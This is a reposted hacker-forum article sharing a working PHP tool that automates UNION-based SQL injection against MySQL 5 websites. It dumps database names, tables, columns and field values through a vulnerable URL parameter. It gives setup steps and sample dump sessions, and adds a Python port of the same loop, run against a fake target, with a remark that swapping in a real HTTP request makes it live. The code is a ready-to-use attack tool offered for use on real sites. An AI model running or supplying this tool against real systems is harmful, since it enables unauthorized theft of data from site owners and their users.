Article author: Mika, from: Evil Octal (EST)
Since MySQL 5 came out, injection vulnerabilities have become far easier to exploit: data can be dumped directly, as with MSSQL, and in fact more easily than with MSSQL. Error-based dumping on MSSQL needs error messages to be enabled on the target; if they are switched off you have to fall back to blind brute-forcing, whereas on MySQL all you need is an injection point where any one column of a UNION SELECT is displayed on the page. Ever since reading FLYH4T's article "Mysql5 Injection Skills Summary" I had wanted to try this out, and I found that plenty of sites have already upgraded to this version, but dumping by hand is tedious. To save effort I naturally used what I know to write a simple tool that dumps automatically, which is a lot more convenient than doing it manually. I expect many people could use a tool like this; there are some on the net, including the latest Pangolin, but my test results with them were not satisfactory, so a tool of my own is handier. There is nothing technically clever in the code, but in the spirit of sharing I am posting it as a tool for everyone. Please don't laugh at me.
The tool is written in PHP (because I find PHP convenient to write). The code is as follows:
<?php
error_reporting(7);
echo "Mysql ver 5 SQL injection exploiter\ncoded by mika[est]\n";
if ($argc > 7 || $argc < 2) {
    echo <<<INFO
Usage: $argv[0] -d | -t [table [-f field [-c condition]]]
INFO;
    die;
}
//****************************************************************************
// Injection URL with a UNION whose 6th column is echoed on the page; the marker
// MIKA_MIKA stands in for that column. $db_name is the target database name.
$url = "http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8";
$db_name = "vuldb";
//****************************************************************************
$curl = curl_init();
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_PROXY, "127.0.0.1:8080"); // comment out if no proxy is needed

// Request $url and pull the first ||value|| out of the response.
// The || delimiters are kept so that a value of 0 still counts as a hit.
function find_value($url) {
    global $curl;
    curl_setopt($curl, CURLOPT_URL, $url);
    $content = curl_exec($curl);
    if (preg_match("/(\|\|.+?\|\|)/i", $content, $result)) {
        return $result[1];
    }
    return 0;
}

// Turn "vuldb" into char(118,117,108,100,98) so the payload needs no quote
// characters (works even when magic_quotes escapes ' and ").
function str2ascii($str) {
    $codes = array();
    for ($i = 0; $i < strlen($str); $i++) {
        $codes[] = ord($str[$i]);
    }
    return "char(" . implode(",", $codes) . ")";
}

// Walk a LIMIT n,1 query: replace MIKA_NUM with 0,1,2,... until no value comes back.
function walk($new_url) {
    $i = 0;
    do {
        $new = str_replace("MIKA_NUM", $i, $new_url);
        if ($v1 = find_value($new))
            echo $v1 . "\n";
        $i++;
    } while ($v1);
}

function exploit_db() {
    global $url;
    $new_url = str_replace("MIKA_MIKA", "concat(0x7c7c,schema_name,0x7c7c)", $url);
    $new_url .= "%20from%20information_schema.schemata%20limit%20MIKA_NUM,1/*";
    echo "DATABASES:\n";
    walk($new_url);
}

function exploit_tab() {
    global $url, $db_name;
    $new_url = str_replace("MIKA_MIKA", "concat(0x7c7c,table_name,0x7c7c)", $url);
    $new_url .= "%20from%20information_schema.tables%20where%20table_schema=" . str2ascii($db_name) . "%20limit%20MIKA_NUM,1/*";
    echo "Tables of database " . strtoupper($db_name) . ":\n";
    walk($new_url);
}

function exploit_field() {
    global $url, $table_name;
    // Filters on table_name only, so a table that exists in several databases
    // returns the columns of all of them.
    $new_url = str_replace("MIKA_MIKA", "concat(0x7c7c,column_name,0x7c7c)", $url);
    $new_url .= "%20from%20information_schema.columns%20where%20table_name=" . str2ascii($table_name) . "%20limit%20MIKA_NUM,1/*";
    echo "Columns of table " . strtoupper($table_name) . ":\n";
    walk($new_url);
}

function exploit_value($mode = 0) {
    global $url, $db_name, $table_name, $field_name, $condition;
    $new_url = str_replace("MIKA_MIKA", "concat(0x7c7c," . $field_name . ",0x7c7c)", $url);
    if ($mode) {
        // One row selected by the caller's WHERE condition. Spaces are encoded here;
        // anything else in the condition must already be URL-safe.
        $new_url .= "%20from%20$db_name.$table_name%20where%20" . str_replace(" ", "%20", $condition) . "/*";
        if ($v1 = find_value($new_url))
            echo $v1 . "\n";
        return;
    }
    $new_url .= "%20from%20$db_name.$table_name%20limit%20MIKA_NUM,1/*";
    echo "$field_name values of table " . strtoupper($table_name) . ":\n";
    walk($new_url);
}

switch ($argc) {
    case 2:                      // -d  or  -t
        if ($argv[1] == "-t")
            exploit_tab();
        if ($argv[1] == "-d")
            exploit_db();
        break;
    case 3:                      // -t table
        $table_name = $argv[2];
        exploit_field();
        break;
    case 5:                      // -t table -f field
    case 6:
        $table_name = $argv[2];
        $field_name = $argv[4];
        exploit_value();
        break;
    case 7:                      // -t table -f field -c condition
        $table_name = $argv[2];
        $field_name = $argv[4];
        $condition = $argv[6];
        exploit_value(1);
        break;
}
?>
The code is very simple and I cut a lot of corners; it is a rough version that does whatever was quickest, but it is enough to dump field values. A brief explanation:

The parameters between the two //********* lines have to be edited directly in the code, because they are too long to be convenient on the command line. $url is the vulnerable URL with the UNION appended, in the form the code shows:

http://www.vul.com/display_msg.p ... 0union%20select%201,2,3,4,5,6,7,8

The "and 1=2" makes the original query return nothing, so the row the page displays is the one from the UNION. Suppose the 6th column is the one shown on the page: replace the 6 with "MIKA_MIKA" and do not append a comment at the end (the program adds /* itself when it submits the request). The final URL then looks like this:

$url = "http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8";

$db_name is the name of the target database; you can get it by putting the database() function into the displayed column, then fill it in here.
Once those are filled in it is ready to use, very simple. Open cmd and change to the directory holding the script. For example, to list all databases:

f:\scripts\php\mine>php mysql5.php -d
Mysql ver 5 SQL injection exploiter
coded by mika[est]
DATABASES:
||information_schema||
||vuldb||

Fetch table names:

f:\scripts\php\mine>php mysql5.php -t
Mysql ver 5 SQL injection exploiter
coded by mika[est]
Tables of database VULDB:
||articles||
||audio||
... (omitted)

Dump column names:

f:\scripts\php\mine>php mysql5.php -t articles
Mysql ver 5 SQL injection exploiter
coded by mika[est]
Columns of table ARTICLES:
||id||
||article_id||
||title||
||type||
... (omitted)

Dump values:

f:\scripts\php\mine>php mysql5.php -t articles -f type
Mysql ver 5 SQL injection exploiter
coded by mika[est]
type values of table ARTICLES:
||2||
||1||
... (omitted)

If you want to add your own condition, append -c followed by the WHERE condition (without the word "where") to narrow the result, for example:

f:\scripts\php\mine>php mysql5.php -t articles -f id -c type=2
Mysql ver 5 SQL injection exploiter
coded by mika[est]
||58||
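The enumeration loop that session runs, as an added example (not Mika's code and not part of the original article), written in Python so it can be run offline: it builds the same four payload shapes (schemata, tables, columns, values) with the 0x7c7c delimiter and char() encoding, pulls the ||value|| out of the response, and advances the LIMIT offset until a request comes back without the marker. The target is a constructed stand-in class that answers those four query shapes from an in-memory catalogue; it is a pattern matcher for the demo, not a SQL engine, and the catalogue contents (vuldb, articles, audio, the row values) are made up to mirror the sample session. Two deliberate differences from the PHP: spaces in a -c condition are URL-encoded, and a returned value of 0 does not end the loop.

```python
import re
from urllib.parse import unquote

MARKER = "MIKA_MIKA"   # stands in for the UNION column that the page echoes
OFFSET = "MIKA_NUM"    # stands in for the LIMIT offset while we iterate
DELIM_HEX = "0x7c7c"   # "||" as a hex literal: the payload needs no quote characters
# Same injection URL as the tool's $url (hypothetical host from the article).
BASE_URL = ("http://www.vul.com/display_msg.php?id=432%20and%201=2"
            "%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8")


def str2ascii(s):
    """'vuldb' -> 'char(118,117,108,100,98)', so string literals need no quotes."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def make_template(expr, tail):
    """Put concat(||,expr,||) into the echoed column, append the FROM/LIMIT tail
    and the closing /* comment, and URL-encode spaces the way the tool does."""
    sel = f"concat({DELIM_HEX},{expr},{DELIM_HEX})"
    return (BASE_URL.replace(MARKER, sel) + " " + tail + "/*").replace(" ", "%20")


def db_template():
    return make_template("schema_name",
                         f"from information_schema.schemata limit {OFFSET},1")


def table_template(db):
    return make_template("table_name", "from information_schema.tables where "
                         f"table_schema={str2ascii(db)} limit {OFFSET},1")


def column_template(table):
    # Filters on table_name only (as the tool does), so a table name that exists
    # in several schemas returns the columns of all of them.
    return make_template("column_name", "from information_schema.columns where "
                         f"table_name={str2ascii(table)} limit {OFFSET},1")


def value_template(db, table, field, condition=None):
    if condition:                      # one row chosen by a WHERE, no iteration
        return make_template(field, f"from {db}.{table} where {condition}")
    return make_template(field, f"from {db}.{table} limit {OFFSET},1")


def extract(html):
    """First ||...|| in the response, or None. A zero value comes back as '0',
    so a 0 in the data does not stop the enumeration."""
    m = re.search(r"\|\|(.+?)\|\|", html)
    return m.group(1) if m else None


def enumerate_all(fetch, template, max_rows=200):
    """Advance the LIMIT offset 0,1,2,... until a response carries no marker."""
    rows = []
    for i in range(max_rows):
        value = extract(fetch(template.replace(OFFSET, str(i))))
        if value is None:
            break
        rows.append(value)
    return rows


class FakeTarget:
    """Constructed stand-in for display_msg.php: answers the four query shapes
    above from an in-memory catalogue {db: {table: [row dicts]}}."""

    def __init__(self, catalogue):
        self.cat = catalogue

    @staticmethod
    def _decode_char(text):
        nums = re.search(r"char\(([\d,]+)\)", text).group(1)
        return "".join(chr(int(n)) for n in nums.split(","))

    def fetch(self, url):
        q = unquote(url).split("union select ", 1)[1]
        m = re.search(r"concat\(0x7c7c,(\w+),0x7c7c\)(.*)/\*$", q)
        expr, rest = m.group(1), m.group(2)
        off = re.search(r"limit (\d+),1", rest)
        idx = int(off.group(1)) if off else 0
        if "information_schema.schemata" in rest:
            rows = [{"schema_name": n} for n in ["information_schema", *self.cat]]
        elif "information_schema.tables" in rest:
            rows = [{"table_name": t} for t in self.cat.get(self._decode_char(rest), {})]
        elif "information_schema.columns" in rest:
            wanted = self._decode_char(rest)
            rows = [{"column_name": c} for schema in self.cat.values()
                    for t, data in schema.items() if t == wanted for c in data[0]]
        else:
            db, table = re.search(r"from (\w+)\.(\w+)", rest).groups()
            rows = self.cat[db][table]
            w = re.search(r"where (\w+)=(\w+)", rest)
            if w:
                rows = [r for r in rows if str(r[w.group(1)]) == w.group(2)]
        if idx >= len(rows):                      # past the last row: no marker
            return "<html><body>No such message.</body></html>"
        return f"<html><body><h1>||{rows[idx][expr]}||</h1></body></html>"


def demo():
    """The whole session from the article against a made-up catalogue."""
    target = FakeTarget({"vuldb": {
        "articles": [{"id": 58, "article_id": 7, "title": "hello", "type": 2},
                     {"id": 59, "article_id": 8, "title": "world", "type": 1}],
        "audio": [{"id": 1, "path": "/a.mp3"}]}})
    fetch = target.fetch
    dbs = enumerate_all(fetch, db_template())                                  # -d
    tables = enumerate_all(fetch, table_template("vuldb"))                     # -t
    cols = enumerate_all(fetch, column_template("articles"))                   # -t articles
    types = enumerate_all(fetch, value_template("vuldb", "articles", "type"))  # -f type
    one = extract(fetch(value_template("vuldb", "articles", "id", "type=2")))  # -c type=2
    return dbs, tables, cols, types, one


if __name__ == "__main__":
    for label, result in zip(("DATABASES", "TABLES", "COLUMNS", "type", "id where type=2"), demo()):
        print(label, result)
```

Swapping FakeTarget.fetch for a real HTTP GET (urllib or requests, through the same 127.0.0.1:8080 proxy if you want to watch the traffic) turns this into the live loop; everything else, including the stop condition, stays the same.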
The program is very simple, but the basic functions are there. I wrote it as things occurred to me, so whatever I improve later I will bring back and share. There are bound to be mistakes in the code and room for improvement, so please help fix it. Also note this line in the code:

curl_setopt($curl, CURLOPT_PROXY, "127.0.0.1:8080");

It routes every request through a proxy; if you don't need one, just comment it out.
Disclaimer: please keep this article intact when reproducing it. I also hope people won't be stingy: if you make improvements, please share them too, even though my code isn't much.
Source: http://www.bkjia.com/PHPjc/509165.html